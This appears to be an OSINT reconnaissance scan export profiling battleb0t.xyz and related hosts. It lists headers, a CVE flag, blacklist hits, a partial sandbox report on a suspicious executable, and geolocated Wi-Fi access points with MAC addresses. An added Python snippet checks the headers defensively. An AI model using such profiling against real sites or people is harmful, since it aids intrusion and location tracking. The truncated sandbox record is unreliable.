| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 1 | 1 | 0 | None | pics.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Computing websites | battleb0t.github.io |
| 2023-05-12 02:52:28 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [104.196.30.220]
https://www.virustotal.com/en/ip-address/104.196.30.220/information/ | 104.196.30.220 |
| 2023-05-12 02:58:43 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | ayhu.xyz |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.107): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5c82adbc7b2323-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.61): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom90F1C4 (Net ID: 00:0C:F6:90:F1:C4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-B962 (Net ID: 00:1D:D5:BA:B9:60) | 32.8608, -79.9746 |
| 2023-05-12 02:44:31 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.com | cdn-185-199-111-153.github.com |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.212): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NotLakehouse (Net ID: 00:0C:41:6F:1D:BC) | 39.0469, -77.4903 |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.104 | 87.248.157.102 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.22): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.42): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RossAviation206 (Net ID: 00:0C:42:6C:BE:A6) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f60715ea2423d-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:21 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.110.0/24 | 185.199.110.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-004 (Net ID: 00:04:E2:F4:8A:F5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wagmound (Net ID: 00:01:71:0A:16:DF) | 52.3759, 4.8975 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.230): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [james-gamboa.github.io]<br>https://www.openphish.com/feed.txt | james-gamboa.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 410HowardStudios (Net ID: 00:02:2D:00:25:63) | 37.780462,-122.390564 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.174): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-2AD2 (Net ID: 90:1A:CA:7E:2A:D0) | 37.751, -97.822 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:80 | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | downtown7 (Net ID: 00:01:E3:DE:06:3F) | 50.1188, 8.6843 |
| 2023-05-12 02:53:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-58693743083355784', u'signatures': [], u'threat_level': 1, u'size': 1411144, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'sha512': u'dc93938623bfb168b27fbe2475df1838b75b6655fa8816c058f64c8dd7803679e7bab7c8b5da07f2eb9436da2e84973253e7509def261f0f7dcb638684769eba', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'6455a98ae3cb0ab470017f93', u'created_at': u'2023-05-06T01:12:42+00:00', u'filename': u'bounty-58693743083355784'}, {u'url': None, u'submission_id': u'6455a98a5a7739690c0ed96f', u'created_at': u'2023-05-06T01:12:42+00:00', u'filename': u'bounty-42554279808800971'}], u'analysis_start_time': u'2023-05-06T01:12:42+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'3855aaa9b3c3632acee05508966072c0', u'network_mode': u'default', u'processes': [], u'sha1': u'f165233f7d4ac46b1150eef6e9d1ff16d2b496a0', u'url_analysis': False, u'type': u'PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'suspicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', 
u'64bits', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [{u'file_process_pid': 6884, u'filename': u'00000000-00006884.00000000.78323.8EB30000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\rufus-4.0p.exe', u'flags': u'00000040', u'file_process_sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'address': u'8EB30000', u'verdict': u'suspicious', u'file_process': u'rufus-4.0p.exe'}, {u'file_process_pid': 6884, u'filename': u'00000000-00006884.00000000.78323.B850F000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\rufus-4.0p.exe', u'flags': u'00000040', u'file_process_sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'address': u'B850F000', u'verdict': u'suspicious', u'file_process': u'rufus-4.0p.exe'}], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': 39, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': 4, u'submit_name': u'rufus-4.0p.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "KERNEL32" at base 8c1f0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\TEMP\\VXOLE64.DLL" at base 781f0000\n "rufus-4.0p.exe" loaded module "KERNEL32.DLL" at base 8c1f0000\n "rufus-4.0p.exe" loaded module "ADVAPI32.DLL" at base 8ea00000\n "rufus-4.0p.exe" loaded module "COMCTL32.DLL" at base 7b8b0000\n "rufus-4.0p.exe" 
loaded module "COMDLG32.DLL" at base 8c940000\n "rufus-4.0p.exe" loaded module "CRYPT32.DLL" at base 8afa0000\n "rufus-4.0p.exe" loaded module "GDI32.DLL" at base 8c910000\n "rufus-4.0p.exe" loaded module "MSVCRT.DLL" at base 8cd50000\n "rufus-4.0p.exe" loaded module "OLE32.DLL" at base 8c0a0000\n "rufus-4.0p.exe" loaded module "SETUPAPI.DLL" at base 8c420000\n "rufus-4.0p.exe" loaded module "SHELL32.DLL" at base 8d5c0000\n "rufus-4.0p.exe" loaded module "SHLWAPI.DLL" at base 8c3c0000\n "rufus-4.0p.exe" loaded module "USER32.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "RPCRT4.DLL" at base 8c2a0000\n "rufus-4.0p.exe" loaded module "SSPICLI.DLL" at base 8ad90000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\WINTRUST.DLL" at base 8af40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\CRYPT32.DLL" at base 8afa0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\RSAENH.DLL" at base 8a2d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL" at base 8bd40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 894d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\VDS_PS.DLL" at base 7b1a0000\n "rufus-4.0p.exe" loaded module "RICHED20" at base 6ee00000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\GPEDIT.DLL" at base 6ec40000\n "rufus-4.0p.exe" loaded module "COMCTL32" at base 7b8b0000\n "rufus-4.0p.exe" loaded module "OLEAUT32.DLL" at base 83960000\n "rufus-4.0p.exe" loaded module "EXT-MS-WIN-RTCORE-NTUSER-WINDOW-EXT-L1-1-0.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "EXT-MS-WIN-RTCORE-NTUSER-INTEGRATION-L1-1-0.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-COM-L1-1-0.DLL" at base 8ceb0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\MSCTF.DLL" at base 8ca50000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\OLE32.DLL" at base 8c0a0000\n "rufus-4.0p.exe" loaded module "WININET" at base 7b4d0000\n "rufus-4.0p.exe" loaded 
module "%WINDIR%\\SYSTEM32\\ICONCODECSERVICE.DLL" at base 81ad0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\OLEACC.DLL" at base 78c40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\EXPLORERFRAME.DLL" at base 76790000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NETPROFM.DLL" at base 87ef0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NPMPROXY.DLL" at base 85820000\n "rufus-4.0p.exe" loaded module "ONDEMANDCONNROUTEHELPER.DLL" at base 6f650000\n "rufus-4.0p.exe" loaded module "WINHTTP.DLL" at base 854f0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\ONDEMANDCONNROUTEHELPER.DLL" at base 6f650000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\MSWSOCK.DLL" at base 8a6c0000\n "rufus-4.0p.exe" loaded module "MSISO.DLL" at base 7e860000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\RASADHLP.DLL" at base 83790000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL" at base 83b90000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\WS2_32" at base 8d550000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\SCHANNEL.DLL" at base 8a210000\n "rufus-4.0p.exe" loaded module "MSKEYPROTECT.DLL" at base 7e020000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\EN-US\\SHELL32.DLL.MUI" at base ffc10000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\CRYPTNET.DLL" at base 7a6d0000\n "rufus-4.0p.exe" loaded module "CRYPTNET.DLL" at base 7a6d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NCRYPTSSLP.DLL" at base 7e0d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\GPEDIT.DLL" at base 6ece0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" called 
"LoadLibrary" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter kernel32 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter KERNEL32.DLL (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter COMCTL32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter comdlg32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter GDI32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter msvcrt.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter ole32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SETUPAPI.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SHLWAPI.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter USER32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter kernel32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter Riched20 (UID: 00000000-00006884)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function addresses', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" called "GetProcAddress" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "GetProcAddress" with a parameter FlsAlloc (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "GetProcAddress" with a parameter FlsSe | 185.199.109.153 |
| 2023-05-12 03:10:01 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | expressdryclean.gr | expressdryclean.gr |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_4.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | www.ayhu.xyz |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.69): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:13:49:EC:E1:54) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60483bb94334-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
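Both `Non-Standard HTTP Header` rows above are Cloudflare edge responses, and the first carries `cf-mitigated: challenge`, which Cloudflare sets when it serves a challenge interstitial instead of the origin page. Any spider finding derived from that fetch describes the challenge page, not the site (the `Web Content Type` row for www.ayhu.xyz carries the same 02:54:22 timestamp as that response's `date` header, so it is likely one of them). The Python below is an added example, not part of the SpiderFoot output: it takes the two header sets (copied from the rows above, trimmed to the headers it reads, with the `s=` token of each NEL report endpoint shortened), flags challenged fetches, pulls the colo code from `cf-ray`, and lists which common security headers are present and missing. The header names in `SECURITY_HEADERS` are the checker's own choice, not something the scan asserts.

```python
import json

# Response headers copied from the two "Non-Standard HTTP Header" rows above,
# trimmed to what this check reads; the s= token in each Report-To endpoint is
# shortened here.
CHALLENGE_RESPONSE = {
    "server": "cloudflare",
    "cf-ray": "7c5f60715ea2423d-EWR",
    "cf-mitigated": "challenge",
    "date": "Fri, 12 May 2023 02:54:22 GMT",
    "content-type": "text/html; charset=UTF-8",
    "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0",
    "x-frame-options": "SAMEORIGIN",
    "referrer-policy": "same-origin",
    "cross-origin-opener-policy": "same-origin",
    "cross-origin-embedder-policy": "require-corp",
    "cross-origin-resource-policy": "same-origin",
    "permissions-policy": "accelerometer=(),autoplay=(),camera=(),geolocation=(),microphone=(),payment=(),usb=()",
    "nel": '{"success_fraction":0,"report_to":"cf-nel","max_age":604800}',
    "report-to": '{"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0..."}],"group":"cf-nel","max_age":604800}',
}

STATIC_RESPONSE = {
    "server": "cloudflare",
    "cf-ray": "7c5f60483bb94334-EWR",
    "cf-cache-status": "REVALIDATED",
    "date": "Fri, 12 May 2023 02:54:16 GMT",
    "content-type": "application/javascript",
    "cache-control": "public, max-age=14400, must-revalidate",
    "x-content-type-options": "nosniff",
    "referrer-policy": "strict-origin-when-cross-origin",
    "access-control-allow-origin": "*",
    "etag": 'W/"79120efbf2a0b92da044ff91335c99c1"',
    "nel": '{"success_fraction":0,"report_to":"cf-nel","max_age":604800}',
    "report-to": '{"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yR..."}],"group":"cf-nel","max_age":604800}',
}

# Headers worth confirming on an origin response. A challenge page's own set
# says nothing about the origin's policy, which is why challenged fetches are
# flagged separately below.
SECURITY_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
    "referrer-policy",
    "permissions-policy",
    "cross-origin-opener-policy",
    "cross-origin-embedder-policy",
    "cross-origin-resource-policy",
)


def analyze_response(headers):
    """Classify one response: CDN, challenge status, colo, content type, security headers."""
    h = {k.lower(): v for k, v in headers.items()}
    ray = h.get("cf-ray", "")
    # cf-ray is "<request id>-<colo>"; the colo suffix says which edge answered.
    colo = ray.rsplit("-", 1)[1] if "-" in ray else None
    endpoints = []
    if "report-to" in h:
        try:
            endpoints = [e["url"] for e in json.loads(h["report-to"]).get("endpoints", [])]
        except (ValueError, KeyError, TypeError):
            pass  # malformed Report-To: leave the list empty rather than fail the row
    return {
        "cdn": h.get("server"),
        "challenged": h.get("cf-mitigated", "").lower() == "challenge",
        "colo": colo,
        "content_type": h.get("content-type", "").split(";")[0].strip(),
        "cacheable": "no-store" not in h.get("cache-control", ""),
        "present": [name for name in SECURITY_HEADERS if name in h],
        "missing": [name for name in SECURITY_HEADERS if name not in h],
        "report_endpoints": endpoints,
    }


def challenged_rays(responses):
    """cf-ray ids of fetches that got a challenge page; findings tied to them need a re-fetch."""
    return [r.get("cf-ray") for r in responses if analyze_response(r)["challenged"]]


if __name__ == "__main__":
    for resp in (CHALLENGE_RESPONSE, STATIC_RESPONSE):
        a = analyze_response(resp)
        status = "CHALLENGE PAGE, origin not observed" if a["challenged"] else "origin content"
        print(resp["cf-ray"], a["colo"], a["content_type"], status)
        print("  missing:", ", ".join(a["missing"]))
    print("re-fetch needed for:", challenged_rays([CHALLENGE_RESPONSE, STATIC_RESPONSE]))
```

Run stand-alone it prints one line per response plus the list of rays to re-fetch; in a scan pipeline the `challenged_rays` output is what you would join back against the spider's `Web Content Type` and `Linked URL` rows before trusting them.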
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5c61b40afd1911-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.183): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SR.Mandant (Net ID: 00:01:21:30:6F:34) | 50.1188, 8.6843 |
